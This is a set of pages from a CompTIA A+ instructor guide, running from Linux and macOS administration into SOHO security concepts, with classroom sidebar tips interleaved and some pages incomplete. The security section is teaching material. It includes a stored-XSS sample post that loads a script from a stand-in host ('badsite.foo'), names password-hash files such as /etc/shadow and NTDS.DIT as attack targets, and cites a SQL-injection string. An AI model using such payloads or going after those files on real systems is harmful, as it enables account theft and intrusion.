• Move and rename the file alarm.dat in the current directory to alarm.
bak in /tmp:
mv alarm.dat /tmp/alarm.bak
• Rename the file app1.dat in the /var/log folder to app1.old:
mv /var/log/app1.dat /var/log/app1.old
rm Command
The rm command can be used to delete files. It can also be used with the -r
option to delete directories. For example:
• Remove the single file data.old from the current working directory:
rm data.old
• Remove all files ending in .bak from the /var/log directory:
rm /var/log/*.bak
• Remove the contents of the entire directory tree underneath the folder /home/
david/data:
rm -r /home/david/data
Use the -r switch with caution, and remember that Linux commands operate without
confirmation prompts. There is no opportunity to cancel.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 515
df and du Commands
The df and du commands check free space and report usage by the device,
directory, or file specified as the argument:
• df (“disk free”) enables you to view the device’s free space, file system, total size,
space used, percentage value of space used, and mount point.
• du (“disk usage”) displays how a device is used, including the size of directory
trees and files within it.
The main advantage of sudo over su is that the root password does not have to be
shared between multiple administrators.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
516 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
• 5 in the second position grants read and execute to the group: 4(r)+0+1(x).
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 517
chmod Command
The chmod command can be used to secure files and directories, using either
symbolic or octal notation. Only the owner can change permissions.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
518 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
apt-get Command
apt-get is a command interface for APT. The following basic commands are used to
update/patch and install software.
• Refresh the local database with information about the packages available from
the repository:
apt-get update
• Update all packages with the latest versions:
apt-get upgrade
• Install a new application:
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 519
yum Command
yum is the command interface for YUM. The following basic commands are used to
update/patch and install software.
• Refresh the local database with information about the packages available from
the repository:
yum check-update
• Update all packages with the latest versions:
yum update
• Install a new application:
Antivirus
Some people feel that virus detection is unnecessary for Linux when used as a
desktop PC OS. The way the Linux operating system is built (and the fact that there
are many distributions) means that unlike Windows, it is harder to write a virus
that will affect every Linux system. Different shells, a simpler security system, and
software package managers with authorized software repositories all mean that a
virus writer has a harder job to infect a Linux system.
This does not mean that Linux is risk-free, however, and each installation should
be assessed for security controls to suit the use to which it is put. There have been
several high-profile cases of either Trojans or serious vulnerabilities in software
distributed through repositories or in popular third-party tools. Any high value
target could be subject to specific, targeted attacks against it. Where Linux is
used as the platform for a web server, for instance, it is imperative to configure
appropriate security controls. Products such as Clam AntiVirus (ClamAV) and the
Snort Intrusion Prevention System (IPS) can be used to block varied malware
threats and attempts to counteract security systems. Though now owned by Cisco,
both ClamAV and Snort are open-source products made freely available under the
General Public License (GPL).
Another scenario for installing Linux anti-malware software is to detect infected
files and prevent onward transmission via email or file transfer to Windows-based
systems.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
520 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Listing all processes on the system. Note that a question mark indicates that a
process has no controlling terminal.
top Command
Like ps, the top command lists all processes running on a Linux system. It acts as a
process management tool by enabling you to prioritize, sort, or terminate processes
interactively. It displays a dynamic process status, reflecting real-time changes.
Different keystrokes within this tool execute various process management actions.
Some of the frequently used command keys include the following.
• ENTER Refresh the status of all processes.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 521
net-tools has been replaced by the iproute2 package. These tools can interface
properly with modern network configuration manager packages. As part of the
iproute2 package, the ip command has options for managing routes as well as
the local interface configuration. The command ip addr replicates the basic
reporting functionality of ifconfig (show the current address configuration). To
report a single interface only, use ip addr show dev eth0. The ip link
command shows the status of interfaces, while ip -s link reports interface
statistics.
The ip link set eth0 up|down command is used to enable or disable an
interface, while ip addr add|delete can be used to modify the IP address
configuration. These changes are not persistent and apply only to the running
configuration, unless run as part of a startup script.
dig Command
dig is powerful tool for gathering information and testing name resolution. It is
installed on most Linux distributions. Output is displayed in an answer section.
Output will include the IP address mapped to the domain name, the DNS server
that answered the query, and how long it took to receive that answer.
The basic syntax is: dig
domainame
The command dig @server domainname will resolve the domain name
against the DNS server specified by the server argument.
Samba
Linux has a Server Message Block (SMB)–compatible file sharing protocol called
Samba. Samba enables the integration of Linux and Windows systems. When
added to a Linux workstation, that workstation can use the Windows file and print
sharing protocol to access shared resources on a Windows host. When the Samba
service is added to a Linux server, the server uses the SMB protocol to share
directories to Windows clients.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
522 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
crontab –l
• To remove jobs from the scheduled list, use the command:
crontab -r
• To enter the editor, run the command crontab –e. crontab uses the vi editor
by default.
The basic syntax for scheduling a job using crontab includes the following:
• mm—specifies the minutes past the hour when the task is to initiate (0–59).
• command—the command or script to run. This should include the full path to
the file.
It is important to note that any of the time/date related parameters can be replaced
by wildcards:
• * specifies any or other characters.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 523
Review Activity:
Features of Linux
3
1. Which Linux command will display detailed information about all files Teaching
and directories in the current directory, including system files? Tip
ls -la Take some time at
the end of each topic
2. A command has generated a large amount of data on the screen. What to answer questions.
could you add to the command to make the output more readable? You can use the
review questions
Either | more or | less. for discussion in
class or set them for
3. What command would allow you to delete the contents of the folder students to complete
individually during or
/home/jaime/junk and all its subdirectories? after class.
rm -r /home/jaime/junk
4. What command could you use to move a file names.doc from your
current directory to the USB stick linked to folder /mnt/usb?
mv names.doc /mnt/usb
5. A file is secured with the numeric permissions 0774. What rights does
another user account have over the file?
Read-only.
sudo
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
524 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 15B
Identify Features of macOS
7
To the left of the menu bar is the Apple menu. This can be used to report support
information (About) and log out or shut down the computer.
Dock
The dock at the bottom of the screen gives one-click access to your favorite apps
and files, similar to the taskbar in Windows. Apps that are open in the dock display
a dot below the icon.
Spotlight Search
Spotlight Search can be used to find almost anything on macOS. To start a new
search, click the magnifying glass in the menu bar or press COMMAND+SPACE to
bring up the search box.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 525
Terminal
The Terminal can be used to access the command-line environment, which uses
either the Z shell (zsh) or Bash. Older macOS versions use Bash, while zsh is the
default from Catalina up.
Mission Control is used to switch between windows and manage multiple desktops.
(Screenshot reprinted with permission from Apple Inc.)
System Preferences
The System Preferences panel is the equivalent of the Windows Settings app. It is Show
the central “go-to” place for changing settings and network options and optimizing a Slide(s)
macOS configuration. System Preferences
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
526 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Among other things, System Preferences can be used to configure input device
options. You should be aware of some differences between the input devices used
for Macs and those used for PCs.
Apple Keyboards
Where PC and Linux keyboards use CTRL, ALT, ALTGR, and START modifier
keys, Mac keyboards have an APPLE/POWER key and COMMAND, OPTION, and
CONTROL keys. COMMAND is closest to the CTRL key in terms of functionality, and
OPTION is usually mapped to ALT.
Use the Keyboard pane in System Preferences to map keys if using a non-Apple
keyboard to operate a Mac.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 527
Configuring the trackpad. (Screenshot reprinted with permission from Apple Inc.)
Displays
The Displays prefpane allows you to scale the desktop, set the brightness level,
calibrate to a given color profile, and configure Night Shift settings to make the
display adapt to ambient light conditions.
Accessibility
The Accessibility prefpane is used to configure assistive vision and sound options,
such as VoiceOver narration of screen elements, cursor size and motion settings,
zoom tools, display contrast and font sizes, and captioning.
Accessibility prefpane showing Zoom options. (Screenshot reprinted with permission Apple Inc.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
528 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
The Sign In button in System Preferences allows you to link an Apple ID to the local account.
(Screenshot reprinted with permission from Apple Inc.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 529
In some prefpanes, changing settings requires administrator approval. Select the lock
icon and authenticate to make those options available.
FileVault
FileVault is a disk encryption product. Encryption protects the data stored on a disk
against the possibility that a threat actor could remove it from the computer and
use a foreign OS to read the files.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
530 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
When disk encryption is enabled, each user account must be configured with a
password. When the disk is encrypted for the first time, you should configure a
recovery method. This is an alternative method of unlocking the disk if a password
is forgotten. The recovery key can be stored in an iCloud account or recorded locally
(do not save the recovery key to the same disk as the encrypted data!).
Finder
The Finder is the macOS equivalent of File Explorer in Windows. It lets the user
navigate all the files and folders on a Mac. It is always present and open in the dock.
iCloud
iCloud is Apple’s online storage solution for its users. It provides a central, shared
location for mail, contacts, calendar, photos, notes, reminders, and so on across
macOS and iOS devices. By default, each user is provided with 5 GB of storage
(at the time of writing), although it is possible to upgrade to more space for an
additional monthly fee. This space is shared across all iCloud components and
devices.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 531
The App Store provides a central portal for Apple and developers to distribute
free and paid-for software. It is also used to distribute updates to macOS and
new releases of the operating system. Access to the App Store is mediated by an
Apple ID.
• PKG format is used where app setup needs to perform additional actions, such
as running a service or writing files to multiple folders.
When the app has been installed, it is placed in a directory with a .APP extension in
the Applications folder.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
532 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Antivirus
Like any other software, macOS is subject to vulnerabilities and security advisories,
some of which can be exploited and are serious enough to an unprivileged user
to obtain root access. It is imperative to patch macOS systems against known
vulnerabilities. There are relatively few instances of the infection of macOS systems
by conventional computer viruses or worms. However, this does not mean that
new threats will not appear in the future. macOS is vulnerable to different kinds of
malware, such as fake security alerts and Trojans. Also, a macOS host could pass on
Windows viruses to other users via email or file transfer. If a Windows boot partition
is installed on macOS, it’s possible for the Windows installation to become infected
with a virus.
The following steps can help to protect a macOS computer from infection:
• Only download trusted apps—By default, macOS will only allow apps to
be installed that have been downloaded from the App Store. If this setting
is changed, ensure that you only download apps and content from trusted
websites.
• Only download trusted content—Again, make sure that you only download
media or other content from reliable, trusted sources.
• Use antivirus software—A number of free A-V packages are available for Mac
(from Avira, Avast, and Sophos, for instance) that will detect malware directed at
macOS—and Windows viruses too—and prevent redistribution via email or file
sharing.
Corporate Restrictions
Any installation of macOS can be enrolled in a mobile device/endpoint management
suite. A supervised macOS can be restricted in terms of app installation and
uninstallation policies. Corporate apps can be pushed to devices via the Business
Manager portal. Apple has published a Platform Deployment guide covering device
management at support.apple.com/guide/deployment/welcome/1/web.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 533
Most apps that are downloaded and installed from a third-party developer will
automatically check if updates are available each time they are run. A prompt will
be displayed to update or to cancel. It’s also possible to manually check for updates
using the Check for Updates menu option in the app itself.
You can manage network settings either from the Status menu on the right-hand
side of the menu bar or via System Preferences.
Status menus in the Menu bar. (Screenshot reprinted with permission from Apple Inc.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
534 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Select the Advanced button in the Network prefpane to configure Wi-Fi options, IP and DNS settings,
and proxy settings. (Screenshot reprinted with permission from Apple Inc.)
Disk Utility
The Disk Utility app can be used to verify or repair a disk or file system. It can also be
used to erase a disk with security options in case you are selling or passing on a Mac.
Use the Disk Utility to report storage status and configure and format volumes.
(Screenshot reprinted with permission from Apple Inc.)
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 535
There is no need to regularly defragment a Mac hard drive. It’s possible to run a
defragmentation, but it should only be needed very rarely.
Configuring Time Machine. (Screenshot reprinted with permission from Apple Inc.)
To restore files from Time Machine, a timeline on the right-hand side of the screen
will show the available backups. Using the Finder window in Time Machine, find
the folder with the file (or files) that you want to restore. Then slide the timeline
back to the date/time of the previous version.
Time Machine stores backups on the local drive as snapshots as well as any available
backup drive. If the backup drive is not attached, you may still be able to restore a file
or version from the local snapshot. If the tick mark next to an item in the timeline is
dimmed, the backup drive needs to be attached to restore that item.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
536 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Using Force Quit to stop an app that is not responding. (Screenshot reprinted
with permission from Apple Inc.)
Recovery Menu
macOS includes a set of utilities that you can use to restore a Mac from the Time
Machine backup program, reinstall macOS from a system image, or reformat or
repair the system disk.
To access the Recovery menu, as you power up the Apple Mac, hold down the
COMMAND+R keys until you see the Apple logo. After selecting your language, it
will boot into macOS Recovery, enabling you to select from the options shown in
the following figure.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 537
macOS Recovery menu. (Screenshot reprinted with permission from Apple Inc.)
When you reboot an Apple Mac, if the startup drive is not available for any
reason and it’s connected to the Internet, the computer will try to boot from a
web-based drive.
Use a Time Machine snapshot backup if you want to restore the Mac to a specific
point in time; for example, if you have replaced or reformatted the hard drive.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
538 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Review Activity:
Features of macOS
8
The Finder.
4. How would you update an app purchased from the Mac App Store?
Open the Mac App Store and select the Updates button.
Time Machine.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 539
Lesson 15
Summary
6
You should be able to identify features of Linux and macOS to help support diverse Show
OS environments. Slide(s)
Summary
Guidelines for Supporting Linux and macOS
Teaching
Follow these guidelines to support Linux and macOS desktop and laptop users:
Tip
• Create knowledge base support documentation to assist users and technicians Try to include some
with command-line management of the following Linux features: time at the end
of each lesson to
• Shell/terminal concepts and man help system. check students’
understanding and
• Directory navigation and file management (nano, cat, pwd, ls, mv, cp, rm, df, answer questions.
grep, find, and backups/cron).
• User and permissions management (su/sudo, chmod, chown, and Samba file
sharing).
• Package and process management (apt-get, yum, ps, top, and antivirus/
integrity checking for updates/patches).
• Disk and file management (iCloud, Time Machine backups, Remote Disc, Disk
Utility, and FileVault).
Additional practice questions for the topics covered in this lesson are available on the
CompTIA Learning Center.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
Lesson 16
Configuring SOHO Network Security
1
LESSON INTRODUCTION
As a CompTIA A+ technician, you are in the position to identify potential security Show
issues before they become big problems. By identifying security threats and Slide(s)
vulnerabilities, as well as some of the controls that can counteract them, you can Objectives
help keep your organization’s computing resources safe from unauthorized access.
In this lesson, you will identify security threats and vulnerabilities, plus some of the Teaching
logical and physical controls used to mitigate them on SOHO networks. Tip
This lesson starts
a block of security-
Lesson Objectives focused content
covering wireless
In this lesson, you will: networks, home
• Explain attacks, threats, and vulnerabilities. routers, workstation
hardening, and mobile
• Compare wireless security protocols. security. This lesson
introduces security
• Configure SOHO router security. concepts beyond
authentication/
• Summarize security measures. authorization and
covers the specific
measures to take
to secure a SOHO
network.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
542 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Topic 16A
Show
Slide(s)
Explain Attacks,
Threats, and
Vulnerabilities
types, including
social engineering.
Your aim should be
CORE 2 EXAM OBJECTIVES COVERED
to equip students 2.4 Explain common social-engineering attacks, threats, and vulnerabilities.
with the vocabulary
and understanding
to support incident
response and security In this topic, you will distinguish the concepts of attacks, threats, and vulnerabilities.
staff rather than to By identifying common security threats and vulnerabilities, you will be better
get into the detail of equipped to suggest or implement the most effective counteractive measures.
attack mechanisms.
Information Security
Show Information security is the practice of controlling access to data that is in any
Slide(s) format, including both computer data and paper records. Secure information
Information Security has three properties, often referred to as the confidentiality, integrity, and
availability (CIA triad):
Teaching
• Confidentiality means that certain information should only be known to certain
Tip
people.
Establish the
context for ensuring • Integrity means that the data is stored and transferred as intended and that any
information security modification is authorized.
and cybersecurity by
the different types • Availability means that information is accessible to those authorized to view or
of assessments:
modify it.
vulnerability, threat,
and risk.
You will also come across the term cybersecurity. Where information security
relates to ensuring data is stored and processed with CIA attributes in electronic
or printed formats, cybersecurity refers specifically to controls that protect against
attacks on computer storage and processing systems.
Information security and cybersecurity are assured by developing security policies
and controls. Making a system more secure is also referred to as hardening it.
Different security policies should cover every aspect of an organization’s use of
computer and network technologies, from procurement and change control to
acceptable use.
As part of this process, security teams must perform assessments to determine how
secure a network is. These assessments involve vulnerabilities, threats, and risk:
• Vulnerability is a weakness that could be accidentally triggered or intentionally
exploited to cause a security breach.
• Risk is the likelihood and impact (or consequence) of a threat actor exercising a
vulnerability.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 543
Vulnerabilities
A vulnerability is some fault or weakness in a system that could be exploited by Show
a threat actor. Vulnerabilities can arise due to a very wide range of causes. Some Slide(s)
of these causes include improperly configured or installed hardware or software, Vulnerabilities
delays in applying and testing software and firmware patches, untested software
and firmware patches, the misuse of software or communication protocols, poorly Teaching
designed network architecture, inadequate physical security, insecure password Tip
usage, and design flaws in software or operating systems, such as unchecked Distinguish
user input. configuration
and software
Non-compliant Systems vulnerabilities
and introduce the
A configuration baseline is a set of recommendations for deploying a computer in concepts of hardening
and attack surface.
a hardened configuration to minimize the risk that there could be vulnerabilities.
There are baselines for different operating systems and for different server and Discuss how
client roles. For example, a web server would have a different configuration computers and
networks become
baseline than a file server would have. The basic principle of a configuration
more vulnerable to
baseline is to reduce the system’s attack surface. The attack surface is all the points application attacks if
a threat actor could try to use to infiltrate or disrupt the system. procedural controls
for patching and
A non-compliant system is one that has drifted from its hardened configuration. monitoring are
A vulnerability scanner is a class of software designed to detect non-compliant inadequate.
systems.
Unprotected Systems
A baseline will recommend specific technical security controls to ensure a secure
configuration. Examples of these controls include antivirus scanners, network and
personal firewalls, and intrusion detection systems. An unprotected system is one
where at least one of these controls is either missing or improperly configured. This
increases the system’s attack surface and potentially exposes more vulnerabilities.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
544 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
The term zero-day is usually applied to the vulnerability itself but can also refer to an
attack or malware that exploits it.
These issues do not just affect PC operating systems and applications. Any type of code
running on a network appliance or device can also be vulnerable to exploits. The risks to
embedded systems have become more obvious and the risks posed by unpatched and
EOL mobile devices and the Internet of Things is growing.
Social Engineering
Show Threat actors can use a diverse range of techniques to compromise a security
Slide(s) system. A prerequisite of many types of attacks is to obtain information about the
Social Engineering network and its security controls. Social engineering—or hacking the human—
refers to techniques that persuade or intimidate people into revealing this kind of
Teaching confidential information or allowing some sort of access to the organization that
Tip should not have been authorized.
Discuss what makes Preventing social engineering attacks requires an awareness of the most common
social engineering
forms of social engineering exploits.
attacks effective and
ensure that students
can distinguish types Impersonation
of attacks.
Impersonation means that the social engineer develops a pretext scenario to
give himself or herself an opportunity to interact with an employee. A classic
impersonation pretext is for the threat actor to phone into a department
pretending to be calling from IT support, claim something must be adjusted on
the user’s system remotely, and persuade the user to reveal his or her password.
For this type of pretexting attack to succeed, the social engineer must gain the
employee’s trust or use intimidation or hoaxes to frighten the employee into
complying.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 545
Do you really know who's on the other end of the line? (Photo by Uros Jovicic on Unsplash.)
Dumpster Diving
To make a pretext seem genuine, the threat actor must obtain privileged
information about the organization or about an individual. For example, an
impersonation pretext is much more effective if the attacker knows the user’s
name. As most companies are set up toward customer service rather than
security, this information is typically easy to come by. Information that might seem
innocuous, such as department employee lists, job titles, phone numbers, diary
appointments, invoices, or purchase orders, can help an attacker penetrate an
organization through impersonation.
Another way to obtain information that will help to make a social engineering attack
credible is by obtaining documents that the company has thrown away. Dumpster
diving refers to combing through an organization’s (or individual’s) garbage to try to
find useful documents. Attackers may even find files stored on discarded removable
media.
A threat actor might stage multiple attacks as part of a campaign. Initial attacks may
only aim at compromising low-level information and user accounts, but this low-level
information can be used to attack more sensitive and confidential data and better
protected management and administrative accounts.
Shoulder Surfing
A shoulder surfing attack means that the threat actor learns a password or PIN
(or other secure information) by watching the user type it. Despite the name,
the attacker may not have to be in proximity to the target—they could use high-
powered binoculars or CCTV to directly observe the target remotely, for instance.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
546 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Example of a phishing email. On the right, you can see the message in its true form as the
mail client has stripped out the formatting (shown on the left) designed to disguise the nature
of the links. (Screenshot courtesy of CompTIA.)
An evil twin attack is similar to phishing but instead of an email, the attacker uses
a rogue wireless access point to try to harvest credentials. An evil twin might have a
similar network name (SSID) to the legitimate one, or the attacker might use some
denial of service (DoS) technique to overcome the legitimate AP. The evil twin might
be able to harvest authentication information from users entering their credentials
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 547
by mistake. For example, the evil twin might allow devices to connect via open
authentication and then redirect users’ web browsers to a spoofed captive portal
that prompts them for their network password.
Threat Types
Historically, cybersecurity techniques were highly dependent on the identification Show
of “static”-known threats, such as computer viruses. This type of threat leaves a Slide(s)
programming code signature in the file that it infects that is relatively straightforward Threat Types
to identify with automated scanning software. Unfortunately, adversaries were able to
develop means of circumventing this type of signature-based scanning. Teaching
The sophisticated nature of modern cybersecurity threats means that it is important Tip
to be able to describe and analyze behaviors. This behavioral analysis involves Explain the concepts
of threat and threat
identifying the attributes of threat actors in terms of location, intent, and capability.
actor, and describe
the first set of attacks
External versus Internal Threats (spoofing and DoS).
An external threat actor is one who has no account or authorized access to
the target system. A malicious external threat actor must infiltrate the security
system using malware and/or social engineering. Note that an external actor may
perpetrate an attack remotely or on-premises (by breaking into the company’s
headquarters, for instance). It is the threat actor who is defined as external, rather
than the attack method.
Conversely, an insider threat actor is one who has been granted permissions on
the system. This typically means an employee, but insider threat can also arise from
contractors and business partners. It is important to realize that insider threat can
be either malicious or non-malicious. An example of malicious insider threat is a
disgruntled or corrupt employee trying to damage or steal confidential company data.
An example of non-malicious insider threat is a technician setting up a Minecraft server
on one of the company’s computers, exposing it to unnecessary risk.
Footprinting Threats
Footprinting is an information-gathering threat in which the attacker attempts to
learn about the configuration of the network and security systems. A threat actor will
perform reconnaissance and research about the target, gathering publicly available
information, scanning network ports and websites, and using social engineering
techniques to try to discover vulnerabilities and ways to exploit the target.
Spoofing Threats
A spoofing threat is any type of attack where the threat actor can masquerade as
a trusted user or computer. Spoofing can mean cloning a valid MAC or IP address,
using a false digital certificate, creating an email message that imitates a legitimate
one, or performing social engineering by pretending to be someone else.
Spoofing can also be performed by obtaining a logical token or software token.
A logical token is assigned to a user or computer during authentication to some
service. A token might be implemented as a web cookie, for instance. If an attacker
can steal the token and the authorization system has not been designed well, the
attacker may be able to present the token again and impersonate the original user.
This type of spoofing is also called a replay attack.
On-path Attacks
An on-path attack is a specific type of spoofing where the threat actor can covertly
intercept traffic between two hosts or networks. This allows the threat actor to
read and possibly modify the packets. An on-path attack is often designed to try to
recover password hashes. An evil twin is one example of an on-path attack.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
548 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
Using a command & control (C&C) network to operate a botnet of compromised hosts and
coordinate a DDoS attack.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 549
Password Attacks
On-path and malware attacks can be difficult to perpetrate. Many network Show
intrusions occur because a threat actor simply obtains credentials to access the Slide(s)
network. Also, when threat actors gains some sort of access via an on-path or Password Attacks
malware attack, they are likely to attempt to escalate privileges to gain access to
other targets on the network by harvesting credentials for administrative accounts. Teaching
Tip
A plaintext password can be captured by obtaining a password file or by sniffing
unencrypted traffic on the network. If the protocol does not use encryption, then Briefly explain
password storage and
the threat actor can simply read the password string from the captured frames.
transport mechanisms
and the use of hashes.
Explain how hashes
can be captured and
the brute force and
dictionary methods
that could allow a
threat actor to recover
the plaintext password
string from a hash.
If authentication credentials are transmitted in cleartext, such as the unencrypted version of the
IMAP mailbox access protocol, it is a simple matter for the credentials to be intercepted via packet
sniffing. (Screenshot courtesy of Wireshark.)
A threat actor might obtain a database of password hashes from the local
system. Common password hash files and databases include %SystemRoot%\
System32\config\SAM, %SystemRoot%\NTDS\NTDS.DIT (the
Active Directory credential store), and /etc/shadow. The threat actor could
also use an on-path attack to capture a password hash transmitted during user
authentication.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
550 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
• Brute force—The software tries to match the hash against one of every possible
combination it could be. If the password is short (under eight characters) and
noncomplex (using only lower-case letters, for instance), a password might be
cracked in minutes. Longer and more complex passwords increase the amount
of time the attack takes to run.
Hashcat password cracking utility. This example uses a mask to speed up a brute force attack.
The attacker can use a mask by learning or guessing likely facts about how the target chooses a
password, such as its length and likelihood of being a variation on a simple word or phrase.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102) | 551
A cross-site scripting (XSS) attack exploits the fact that the browser is likely to trust
scripts that appear to come from a site the user has chosen to visit. XSS inserts a
malicious script that appears to be part of the trusted site. A nonpersistent type of
XSS attack would proceed as follows:
1. The attacker identifies an input validation vulnerability in the trusted site.
2. The attacker crafts a URL to perform code injection against the trusted site.
This could be coded in a link from the attacker’s site to the trusted site or a
link in a phishing email message.
3. When the user opens the link, the trusted site returns a page containing
the malicious code injected by the attacker. As the browser is likely to be
configured to allow the site to run scripts, the malicious code will execute.
4. The malicious code could be used to deface the trusted site (by adding
any sort of arbitrary HTML code), steal data from the user’s cookies, try to
intercept information entered in a form, or try to install malware. The crucial
point is that the malicious code runs in the client’s browser with the same
permission level as the trusted site.
This type of XSS attack is nonpersistent because at no point is data on the web
server changed. A stored/persistent XSS attack aims to insert code into a back-end
database or content management system used by the trusted site. The threat actor
may submit a post to a bulletin board with a malicious script embedded in the
message, for instance. When other users view the message, the malicious script
is executed. For example, with no input sanitization, a threat actor could type the
following into a new post text field:
Check out this amazing <a
href=“https://trusted.foo”>website</a><script
src=“https://badsite.foo/hook.js”></script>.
Users viewing the post will have the malicious script hook.js execute in their
browser.
LICENSED FOR USE ONLY BY: ATG LEARNING · 7498307 · OCT 09 2022
552 | The Official CompTIA A+ Core 1 and Core 2 Instructor Guide (Exams 220-1101 and 220-1102)
The logical statement 1=1 is always true, and the --# string turns the rest of the
statement into a comment, making it more likely that the web application will parse
this modified version and dump a list of all users.
Teaching
There are three principal types of cryptographic technology: symmetric encryption,
Tip
asymmetric encryption, and cryptographic hashing.
Summarize the basic Cryptographic Hashes
terminology used to
classify cryptographic
A hash is a short representation of data. A hash function takes any amount of
types.
data as input and produces a fixed-length value as output. A cryptographic hash
performs this process as a one-way function that makes it impossible to recover
the original value from the hash. Cryptographic hashes are used for secure storage
of data where the original meaning does not have to be recovered (passwords, for
instance).
Two of the most used cryptographic hash algorithms are Secure Hash Algorithm
(SHA) and Message Digest (MD5). MD5 is the older algorithm and is gradually being
phased out of use.
Symmetric Encryption
A symmetric encryption cipher uses a single secret key to both encrypt and
